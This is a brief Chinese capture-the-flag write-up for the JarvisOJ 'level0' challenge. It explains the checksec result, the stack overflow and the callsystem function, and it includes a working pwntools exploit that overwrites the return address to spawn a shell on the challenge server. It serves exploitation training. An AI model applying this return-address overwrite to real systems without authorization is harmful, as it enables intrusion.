level0

checksec 一波,只开了NX

image.png

再IDA看一下程序 ,栈溢出,再找一找有没有可用的函数

image.png

发现了这个

image.png

exp:

#-*- coding:utf-8 -*-
from pwn import *
# p = process('./level0')
p = remote("pwn2.jarvisoj.com","9881")
callsystem = 0x400596
payload = 0x80*"A" + p64(0) + p64(callsystem)
p.sendline(payload)
p.interactive()

你可能感兴趣的:(level0)